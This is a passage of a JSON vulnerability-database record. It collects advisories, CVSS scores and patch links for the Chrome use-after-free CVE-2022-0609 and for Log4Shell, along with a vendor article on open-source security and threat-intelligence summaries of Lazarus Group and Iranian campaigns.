source, and that's about every company in the whole world, the problem of vulnerabilities in open source is an important one. The data tells us that we can't fully trust Linus' Law - not because open source is less secure than other software, but because **not all bugs are shallow**.\n\nLuckily, there are powerful tools to perform at-scale analysis of a lot of open source projects at once. There have been [[white knight hackers disclose 1000's](<https://www.youtube.com/watch?v=WkdzWiNKzt8>)] of vulnerabilities at once using these methods. It would be naive to not assume that ill-minded organizations and individuals do the same. As an ecosystem that lays the foundation for our software-centric world, the community must improve its ability to find, disclose, and fix security flaws in open source significantly. \n\nLast year, [Google committed $10 billion](<https://blog.google/technology/safety-security/why-were-committing-10-billion-to-advance-cybersecurity/>) to an open source fund to help secure open source with a specific curator role to work alongside the maintainers with specific security efforts. \n\nFurthermore, Debricked helps companies make these vulnerabilities actionable by scanning all your software, every branch, every push, and every commit, for new (open source) vulnerabilities. Debricked even continuously scans all your old commits for every new vulnerability, to make sure they bring up-to-date, accurate, and actionable intelligence on the open source you consume. Debricked even helps developers fix your security flaws with automated pull requests that won't cause dependency hell; pretty neat! \n\n## The truth lies in the data\n\nSo, knowing all this, what is the best way to protect your project or company against open source vulnerabilities? As we've seen in the case of Log4j and Spring4shell as well as the numbers, we can never really trust that the community will find and fix all risks. There's a good chance that there are lots and lots of undiscovered and undisclosed vulnerabilities in your code today, and there's not much you can do about it. \n\nAccording to Debricked, the best way to mitigate this is by implementing continuous vulnerability scanning to your SDLC. By automatically scanning at every push of code, in combination with the machine learning-powered [vulnerability database](<https://debricked.com/vulnerability-database>). This makes sure you're updated in real-time, you'll know about new vulnerabilities before anyone else does. As soon as there's a fix, you can generate a [Fix Pull Request](<https://debricked.com/blog/debricked-launching-automatic-fix-pull-request/>) automatically or solve it manually with Debricked's help. _Currently, Debricked offers remediation for JavaScript and Go, with more language support is to come shortly. _\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-11-01T12:04:00", "type": "thn", "title": "Last Years Open Source - Tomorrow's Vulnerabilities", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-11-01T12:04:08", "id": "THN:161777F5DB73EF3AB5B13EF9F11E3374", "href": "https://thehackernews.com/2022/11/last-years-open-source-tomorrows.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "attackerkb": [{"lastseen": "2023-10-18T07:30:41", "description": "Use after free in Animation in Google Chrome prior to 98.0.4758.102 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.\n\n \n**Recent assessments:** \n \n**AmirFedida** at February 15, 2022 8:23am UTC reported:\n\nGoogle is aware of reports that an exploit for CVE-2022-0609 exists in the wild.\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5Assessed Attacker Value: 3\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-04-05T00:00:00", "type": "attackerkb", "title": "CVE-2022-0609", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-0609"], "modified": "2023-10-07T00:00:00", "id": "AKB:DEE6BA54-6F2D-4A58-9654-B21DD42E3502", "href": "https://attackerkb.com/topics/zfU2ECETgi/cve-2022-0609", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "debiancve": [{"lastseen": "2023-12-06T18:21:14", "description": "Use after free in Animation in Google Chrome prior to 98.0.4758.102 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-04-05T00:15:00", "type": "debiancve", "title": "CVE-2022-0609", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-0609"], "modified": "2022-04-05T00:15:00", "id": "DEBIANCVE:CVE-2022-0609", "href": "https://security-tracker.debian.org/tracker/CVE-2022-0609", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "hivepro": [{"lastseen": "2022-03-25T14:28:59", "description": "THREAT LEVEL: Red. For a detailed advisory, download the pdf file here For more than a month before a fix was available, North Korean state hackers known as Lazarus group exploited a zero-day, remote code execution vulnerability (CVE-2022-0609) in Google Chrome&#x27;s web browser. The attack mainly targets firms situated in the United States, particularly those in the industries of news media, information technology, cryptocurrency, and finance. However, other organizations and countries are also on the list of attackers. The campaign begins by sending them phishing emails purporting to be from recruiters at Disney, Google, and Oracle, offering them false employment opportunities. The emails included links to bogus job-search websites such as Indeed and ZipRecruiter. Targets who clicked on the included malicious URLs were infected with drive-by browser malware downloads. The North Korean groups were utilizing an exploit kit (CVE-2022-0609) with hidden iframes embedded into a variety of websites. The attack kit may fingerprint target devices by collecting details like user-agent and screen resolution. After that the exploit kit executes a Chrome remote code execution hack capable of bypassing the lauded Chrome sandbox to move out onto the system. The Mitre TTPs commonly used by Lazarus Group are: TA0001: Initial AccessTA0007: DiscoveryTA0040: ImpactTA0009: CollectionTA0005: Defense EvasionTA0003: PersistenceTA0011: Command and ControlTA0042: Resource DevelopmentTA0002: ExecutionTA0008: Lateral MovementTA0006: Credential AccessTA0029: Privilege EscalationTA0010: ExfiltrationT1134.002: Access Token Manipulation: Create Process with TokenT1098: Account ManipulationT1583.001: Acquire Infrastructure: DomainsT1583.006: Acquire Infrastructure: Web ServicesT1071.001: Application Layer Protocol: Web ProtocolsT1010: Application Window DiscoveryT1560: Archive Collected DataT1560.002: Archive via LibraryT1560.003: Archive via Custom MethodT1547.001: Boot or Logon Autostart Execution: Registry Run Keys / Startup FolderT1547.009: Boot or Logon Autostart Execution: Shortcut ModificationT1110.003: Brute Force: Password SprayingT1059.003: Command and Scripting Interpreter: Windows Command ShellT1543.003: Create or Modify System Process: Windows ServiceT1485: Data DestructionT1132.001: Data Encoding: Standard EncodingT1005: Data from Local SystemT1001.003: Data Obfuscation: Protocol ImpersonationT1074.001: Data Staged: Local Data StagingT1491.001: Defacement: Internal DefacementT1587.001: Develop Capabilities: MalwareT1561.001: Disk Wipe: Disk Content WipeT1561.002: Disk Wipe: Disk Structure WipeT1189: Drive-by CompromiseT1573.001: Encrypted Channel: Symmetric CryptographyT1048.003: Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolT1041: Exfiltration Over C2 ChannelT1203: Exploitation for Client ExecutionT1008: Fallback ChannelsT1083: File and Directory DiscoveryT1564.001: Hide Artifacts: Hidden Files and DirectoriesT1562.001: Impair Defenses: Disable or Modify ToolsT1562.004: Impair Defenses: Disable or Modify System FirewallT1070.004: Indicator Removal on Host: File DeletionT1070.006: Indicator Removal on Host: TimestompT1105: Ingress Tool TransferT1056.001: Input Capture: KeyloggingT1036.005: Masquerading: Match Legitimate Name or LocationT1571: Non-Standard PortT1027: Obfuscated Files or InformationT1588.004: Obtain Capabilities: Digital CertificatesT1566.001: Phishing: Spearphishing AttachmentT1542.003: Pre-OS Boot: BootkitT1057: Process DiscoveryT1055.001: Process Injection: Dynamic-link Library InjectionT1090.002: Proxy: External ProxyT1012: Query RegistryT1021.001: Remote Services: Remote Desktop ProtocolT1021.002: Remote Services: SMB/Windows Admin SharesT1489: Service StopT1218.001: Signed Binary Proxy Execution: Compiled HTML FileT1082: System Information DiscoveryT1016: System Network Configuration DiscoveryT1033: System Owner/User DiscoveryT1529: System Shutdown/RebootT1124: System Time DiscoveryT1204.002: User Execution: Malicious FileT1047: Windows Management Instrumentation Actor Details Vulnerability Details Indicators of Compromise (IoCs) Patch https://www.google.com/intl/en/chrome/?standalone=1 References https://blog.google/threat-analysis-group/countering-threats-north-korea/", "cvss3": {}, "published": "2022-03-25T14:16:43", "type": "hivepro", "title": "North Korean state-sponsored threat actor Lazarus Group exploiting Chrome Zero-day vulnerability", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2022-0609"], "modified": "2022-03-25T14:16:43", "id": "HIVEPRO:D7EA1CB0468E749402CDC827EECBB9DE", "href": "https://www.hivepro.com/north-korean-state-sponsored-threat-actor-lazarus-group-exploiting-chrome-zero-day-vulnerability/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-02-15T15:29:27", "description": "THREAT LEVEL: Red. For a detailed advisory, download the pdf file here Google released a stable channel update for their Chrome browser that contains a zero-day vulnerability and is actively being exploited-in-wild. This is the first zero-day bug reported in Chrome browser this year. A Use-After-Free (UAF) vulnerability which has been assigned CVE-2022-0609 affects the Animation component that may allow attackers to corrupt data, crash program or execute arbitrary code on computers running unpatched Chrome versions or escape the browser&#x27;s security sandbox. Successful exploitation of this issue may lead to data corruption, program crash or arbitrary code execution. In recent browser versions, a number of controls have been introduced that make exploitation of these use after free vulnerabilities much harder but despite this, they still seem to persist. In addition to the zero-day bug, this update fixed seven other security vulnerabilities as mentioned in the table below. We recommend organizations to update to Chrome 98.0.4758.102 for Windows, Mac and Linux to avoid exploitation and mitigate any potential threats. Potential MITRE ATT&amp;CK TTPs are: TA0040 - Impact TA0001 - Initial Access TA0002 - Execution T1499- Endpoint Denial of Service T1189- Drive-by Compromise T1190- Exploit-public facing application T1203- Exploitation for Client Execution T1499.004- Endpoint Denial of Service: Application or System Exploitation Vulnerability Details Patch Link https://www.google.com/intl/en/chrome/?standalone=1 References https://chromereleases.googleblog.com/2022/02/stable-channel-update-for-desktop_14.html", "cvss3": {}, "published": "2022-02-15T14:31:12", "type": "hivepro", "title": "First zero-day vulnerability of Google Chrome this year actively exploited in wild", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2022-0609"], "modified": "2022-02-15T14:31:12", "id": "HIVEPRO:1BF741505EB0E48023B5A5F80FE0F3EB", "href": "https://www.hivepro.com/first-zero-day-vulnerability-of-google-chrome-this-year-actively-exploited-in-wild/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-11-17T15:39:19", "description": "Threat Level Attack Report For a detailed threat advisory, download the pdf file here Summary Iranian APT activity was detected on the networks of federal agencies. The intruders utilized an exploit targeting Log4Shell (CVE-2021-44228) to install XMRig crypto mining software on an unpatched VMware Horizon server. Due to the similarity in the tools used and attack chain hive pro threat research team has linked it to the Iranian state-sponsored actor Fox Kitten", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-11-17T12:28:57", "type": "hivepro", "title": "Iranian hackers leveraged Log4Shell to penetrate US federal agency", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-11-17T12:28:57", "id": "HIVEPRO:28A01D4CBC8A05BECFBA17B5AF4793F1", "href": "https://www.hivepro.com/iranian-hackers-leveraged-log4shell-to-penetrate-us-federal-agency/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "ubuntucve": [{"lastseen": "2023-12-07T13:45:36", "description": "Use after free in Animation in Google Chrome prior to 98.0.4758.102 allowed\na remote attacker to potentially exploit heap corruption via a crafted HTML\npage.\n\n#### Notes\n\nAuthor| Note \n---|--- \n[alexmurray](<https://launchpad.net/~alexmurray>) | The Debian chromium source package is called chromium-browser in Ubuntu \n[mdeslaur](<https://launchpad.net/~mdeslaur>) | starting with Ubuntu 19.10, the chromium-browser package is just a script that installs the Chromium snap\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-04-05T00:00:00", "type": "ubuntucve", "title": "CVE-2022-0609", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-0609"], "modified": "2022-04-05T00:00:00", "id": "UB:CVE-2022-0609", "href": "https://ubuntu.com/security/CVE-2022-0609", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "github": [{"lastseen": "2023-12-06T17:28:53", "description": "CVE-2022-0609: Use after free in Animation\n\n- https://chromereleases.googleblog.com/2022/02/stable-channel-update-for-desktop_14.html\n- https://vulners.com/cve/CVE-2022-0609\n\nGoogle is aware of reports that exploits for CVE-2022-0609 exist in the wild.\n\nThe exploitation is known to be easy. The attack may be initiated remotely. No form of authentication is needed for a successful exploitation. It demands that the victim is doing some kind of user interaction. Technical details are unknown but an exploit is available.\n\nThere is currently little other public information on the issue other than it has been flagged as `High` severity.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-02-22T21:51:19", "type": "github", "title": "Use after free in Animation", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-0609"], "modified": "2023-02-03T05:06:25", "id": "GHSA-VV6J-WW6X-54GX", "href": "https://github.com/advisories/GHSA-vv6j-ww6x-54gx", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "veracode": [{"lastseen": "2022-07-17T12:39:54", "description": "chromium is vulnerable to use after free. The vulnerability exists in Optimization Guide which allows an attacker to cause a memory corruption.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-02-20T05:48:53", "type": "veracode", "title": "Use After Free", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-0609"], "modified": "2022-02-23T17:29:37", "id": "VERACODE:34289", "href": "https://sca.analysiscenter.veracode.com/vulnerability-database/security/1/1/sid-34289/summary", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-12-09T06:30:46", "description": "log4j is vulnerable to remote code execution. The vulnerability exists due to a lack of sanitization of LDAP and other JNDI related endpoints allowing an attacker who can control log messages or log message parameters to inject and execute arbitrary code via remote LDAP servers when message lookup substitution is enabled. \n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-10T15:09:45", "type": "veracode", "title": "Remote Code Execution (RCE)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-08-17T18:23:56", "id": "VERACODE:33244", "href": "https://sca.analysiscenter.veracode.com/vulnerability-database/security/1/1/sid-33244/summary", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "alpinelinux": [{"lastseen": "2023-12-07T16:20:42", "description": "Use after free in Animation in Google Chrome prior to 98.0.4758.102 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-04-05T00:15:00", "type": "alpinelinux", "title": "CVE-2022-0609", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-0609"], "modified": "2022-04-08T17:14:00", "id": "ALPINE:CVE-2022-0609", "href": "https://security.alpinelinux.org/vuln/CVE-2022-0609", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "cnvd": [{"lastseen": "2022-08-27T04:49:20", "description": "Google Chrome is a web browser from Google, Inc. Google Chrome Animation has a code execution vulnerability that can be exploited by attackers to execute arbitrary code on the system or cause a denial of service condition.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-02-16T00:00:00", "type": "cnvd", "title": "Google Chrome Animation code execution vulnerability", "bulletinFamily": "cnvd", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-0609"], "modified": "2022-03-18T00:00:00", "id": "CNVD-2022-20552", "href": "https://www.cnvd.org.cn/flaw/show/CNVD-2022-20552", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "mscve": [{"lastseen": "2023-12-06T17:02:24", "description": "This CVE was assigned by Chrome. Microsoft Edge (Chromium-based) ingests Chromium, which addresses this vulnerability. Please see [Google Chrome Releases](<https://chromereleases.googleblog.com/2022>) for more information. Google is aware of reports that an exploit for CVE-2022-0609 exists in the wild.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-02-16T08:00:00", "type": "mscve", "title": "Chromium: CVE-2022-0609 Use after free in Animation", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-0609"], "modified": "2022-02-16T08:00:00", "id": "MS:CVE-2022-0609", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-0609", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "checkpoint_advisories": [{"lastseen": "2022-04-08T19:29:13", "description": "A use after free vulnerability exists in Google Chrome. Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary code on the affected system.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-03-27T00:00:00", "type": "checkpoint_advisories", "title": "Google Chrome Use After Free (CVE-2022-0609)", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-0609"], "modified": "2022-03-27T00:00:00", "id": "CPAI-2022-0094", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "prion": [{"lastseen": "2023-11-20T23:17:25", "description": "Use after free in Animation in Google Chrome prior to 98.0.4758.102 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-04-05T00:15:00", "type": "prion", "title": "Design/Logic Flaw", "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-0609"], "modified": "2022-04-08T17:14:00", "id": "PRION:CVE-2022-0609", "href": "https://www.prio-n.com/kb/vulnerability/CVE-2022-0609", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "schneier": [{"lastseen": "2022-04-08T19:28:29", "description": "North Korean hackers have been 